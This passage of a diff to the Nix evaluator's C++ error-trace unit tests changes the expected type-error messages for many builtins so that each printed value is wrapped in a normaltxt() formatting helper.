+ hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.hasAttr")); ASSERT_TRACE2("hasAttr \"foo\" []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the second argument passed to builtins.hasAttr")); } @@ -471,17 +471,17 @@ namespace nix { TEST_F(ErrorTraceTest, removeAttrs) { ASSERT_TRACE2("removeAttrs \"\" \"\"", TypeError, - hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ \"1\" ]", TypeError, - hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); } @@ -490,12 +490,12 @@ namespace nix { TEST_F(ErrorTraceTest, listToAttrs) { ASSERT_TRACE2("listToAttrs 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the argument passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ {} ]", @@ -505,7 +505,7 @@ namespace nix { ASSERT_TRACE2("listToAttrs [ { name = 1; } ]", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the `name` attribute of an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ { name = \"foo\"; } ]", @@ -519,12 +519,12 @@ namespace nix { TEST_F(ErrorTraceTest, intersectAttrs) { ASSERT_TRACE2("intersectAttrs [] []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.intersectAttrs")); ASSERT_TRACE2("intersectAttrs {} []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the second argument passed to builtins.intersectAttrs")); } @@ -533,22 +533,22 @@ namespace nix { TEST_F(ErrorTraceTest, catAttrs) { ASSERT_TRACE2("catAttrs [] {}", TypeError, - hintfmt("expected a string but found %s: %s", "a list", "[ ]"), + hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" {}", TypeError, - hintfmt("expected a list but found %s: %s", "a set", "{ }"), + hintfmt("expected a list but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ { foo = 1; } 1 { bar = 5;} ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); } @@ -565,7 +565,7 @@ namespace nix { TEST_F(ErrorTraceTest, mapAttrs) { ASSERT_TRACE2("mapAttrs [] []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the second argument passed to builtins.mapAttrs")); // XXX: defered @@ -590,12 +590,12 @@ namespace nix { TEST_F(ErrorTraceTest, zipAttrsWith) { ASSERT_TRACE2("zipAttrsWith [] [ 1 ]", TypeError, - hintfmt("expected a function but found %s: %s", "a list", "[ ]"), + hintfmt("expected a function but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.zipAttrsWith")); ASSERT_TRACE2("zipAttrsWith (_: 1) [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating a value of the list passed as second argument to builtins.zipAttrsWith")); // XXX: How to properly tell that the fucntion takes two arguments ? @@ -622,7 +622,7 @@ namespace nix { TEST_F(ErrorTraceTest, elemAt) { ASSERT_TRACE2("elemAt \"foo\" (-1)", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("elemAt [] (-1)", @@ -639,7 +639,7 @@ namespace nix { TEST_F(ErrorTraceTest, head) { ASSERT_TRACE2("head 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("head []", @@ -652,7 +652,7 @@ namespace nix { TEST_F(ErrorTraceTest, tail) { ASSERT_TRACE2("tail 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.tail")); ASSERT_TRACE1("tail []", @@ -665,12 +665,12 @@ namespace nix { TEST_F(ErrorTraceTest, map) { ASSERT_TRACE2("map 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.map")); ASSERT_TRACE2("map 1 [ 1 ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.map")); } @@ -679,17 +679,17 @@ namespace nix { TEST_F(ErrorTraceTest, filter) { ASSERT_TRACE2("filter 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.filter")); ASSERT_TRACE2("filter 1 [ \"foo\" ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.filter")); ASSERT_TRACE2("filter (_: 5) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "5" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "5" ANSI_NORMAL)), hintfmt("while evaluating the return value of the filtering function passed to builtins.filter")); } @@ -698,7 +698,7 @@ namespace nix { TEST_F(ErrorTraceTest, elem) { ASSERT_TRACE2("elem 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.elem")); } @@ -707,17 +707,17 @@ namespace nix { TEST_F(ErrorTraceTest, concatLists) { ASSERT_TRACE2("concatLists 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ 1 ]", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating a value of the list passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ [1] \"foo\" ]", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating a value of the list passed to builtins.concatLists")); } @@ -726,12 +726,12 @@ namespace nix { TEST_F(ErrorTraceTest, length) { ASSERT_TRACE2("length 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.length")); ASSERT_TRACE2("length \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.length")); } @@ -740,21 +740,21 @@ namespace nix { TEST_F(ErrorTraceTest, foldlPrime) { ASSERT_TRACE2("foldl' 1 \"foo\" true", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.foldlStrict")); ASSERT_TRACE2("foldl' (_: 1) \"foo\" true", TypeError, - hintfmt("expected a list but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating the third argument passed to builtins.foldlStrict")); ASSERT_TRACE1("foldl' (_: 1) \"foo\" [ true ]", TypeError, - hintfmt("attempt to call something which is not a function but %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL)); + hintfmt("attempt to call something which is not a function but %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL))); ASSERT_TRACE2("foldl' (a: b: a && b) \"foo\" [ true ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("in the left operand of the AND (&&) operator")); } @@ -763,17 +763,17 @@ namespace nix { TEST_F(ErrorTraceTest, any) { ASSERT_TRACE2("any 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the function passed to builtins.any")); } @@ -782,17 +782,17 @@ namespace nix { TEST_F(ErrorTraceTest, all) { ASSERT_TRACE2("all 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the function passed to builtins.all")); } @@ -801,12 +801,12 @@ namespace nix { TEST_F(ErrorTraceTest, genList) { ASSERT_TRACE2("genList 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.genList")); ASSERT_TRACE2("genList 1 2", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.genList", "an integer")); // XXX: defered @@ -825,21 +825,21 @@ namespace nix { TEST_F(ErrorTraceTest, sort) { ASSERT_TRACE2("sort 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.sort")); ASSERT_TRACE2("sort 1 [ \"foo\" ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.sort")); ASSERT_TRACE1("sort (_: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("attempt to call something which is not a function but %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL)); + hintfmt("attempt to call something which is not a function but %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL))); ASSERT_TRACE2("sort (_: _: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the sorting function passed to builtins.sort")); // XXX: Trace too deep, need better asserts @@ -857,17 +857,17 @@ namespace nix { TEST_F(ErrorTraceTest, partition) { ASSERT_TRACE2("partition 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the partition function passed to builtins.partition")); } @@ -876,17 +876,17 @@ namespace nix { TEST_F(ErrorTraceTest, groupBy) { ASSERT_TRACE2("groupBy 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (x: x) [ \"foo\" \"bar\" 1 ]", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the grouping function passed to builtins.groupBy")); } @@ -895,22 +895,22 @@ namespace nix { TEST_F(ErrorTraceTest, concatMap) { ASSERT_TRACE2("concatMap 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) [ \"foo\" ] # TODO", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: \"foo\") [ 1 2 ] # TODO", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); } @@ -919,12 +919,12 @@ namespace nix { TEST_F(ErrorTraceTest, add) { ASSERT_TRACE2("add \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument of the addition")); ASSERT_TRACE2("add 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument of the addition")); } @@ -933,12 +933,12 @@ namespace nix { TEST_F(ErrorTraceTest, sub) { ASSERT_TRACE2("sub \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument of the subtraction")); ASSERT_TRACE2("sub 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument of the subtraction")); } @@ -947,12 +947,12 @@ namespace nix { TEST_F(ErrorTraceTest, mul) { ASSERT_TRACE2("mul \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument of the multiplication")); ASSERT_TRACE2("mul 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument of the multiplication")); } @@ -961,12 +961,12 @@ namespace nix { TEST_F(ErrorTraceTest, div) { ASSERT_TRACE2("div \"foo\" 1 # TODO: an integer was expected -> a number", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first operand of the division")); ASSERT_TRACE2("div 1 \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second operand of the division")); ASSERT_TRACE1("div \"foo\" 0", @@ -979,12 +979,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitAnd) { ASSERT_TRACE2("bitAnd 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.bitAnd")); ASSERT_TRACE2("bitAnd 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.bitAnd")); } @@ -993,12 +993,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitOr) { ASSERT_TRACE2("bitOr 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.bitOr")); ASSERT_TRACE2("bitOr 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.bitOr")); } @@ -1007,12 +1007,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitXor) { ASSERT_TRACE2("bitXor 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.bitXor")); ASSERT_TRACE2("bitXor 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.bitXor")); } @@ -1038,7 +1038,7 @@ namespace nix { TEST_F(ErrorTraceTest, toString) { ASSERT_TRACE2("toString { a = 1; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ a = " ANSI_CYAN "1" ANSI_NORMAL "; }"), + hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ a = " ANSI_CYAN "1" ANSI_NORMAL "; }")), hintfmt("while evaluating the first argument passed to builtins.toString")); } @@ -1047,17 +1047,17 @@ namespace nix { TEST_F(ErrorTraceTest, substring) { ASSERT_TRACE2("substring {} \"foo\" true", TypeError, - hintfmt("expected an integer but found %s: %s", "a set", "{ }"), + hintfmt("expected an integer but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the first argument (the start offset) passed to builtins.substring")); ASSERT_TRACE2("substring 3 \"foo\" true", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument (the substring length) passed to builtins.substring")); ASSERT_TRACE2("substring 0 3 {}", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the third argument (the string) passed to builtins.substring")); ASSERT_TRACE1("substring (-3) 3 \"sometext\"", @@ -1070,7 +1070,7 @@ namespace nix { TEST_F(ErrorTraceTest, stringLength) { ASSERT_TRACE2("stringLength {} # TODO: context is missing ???", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the argument passed to builtins.stringLength")); } @@ -1079,7 +1079,7 @@ namespace nix { TEST_F(ErrorTraceTest, hashString) { ASSERT_TRACE2("hashString 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.hashString")); ASSERT_TRACE1("hashString \"foo\" \"content\"", @@ -1088,7 +1088,7 @@ namespace nix { ASSERT_TRACE2("hashString \"sha256\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", "{ }"), + hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument passed to builtins.hashString")); } @@ -1097,12 +1097,12 @@ namespace nix { TEST_F(ErrorTraceTest, match) { ASSERT_TRACE2("match 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.match")); ASSERT_TRACE2("match \"foo\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", "{ }"), + hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument passed to builtins.match")); ASSERT_TRACE1("match \"(.*\" \"\"", @@ -1115,12 +1115,12 @@ namespace nix { TEST_F(ErrorTraceTest, split) { ASSERT_TRACE2("split 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.split")); ASSERT_TRACE2("split \"foo\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", "{ }"), + hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument passed to builtins.split")); ASSERT_TRACE1("split \"f(o*o\" \"1foo2\"", @@ -1133,17 +1133,17 @@ namespace nix { TEST_F(ErrorTraceTest, concatStringsSep) { ASSERT_TRACE2("concatStringsSep 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", 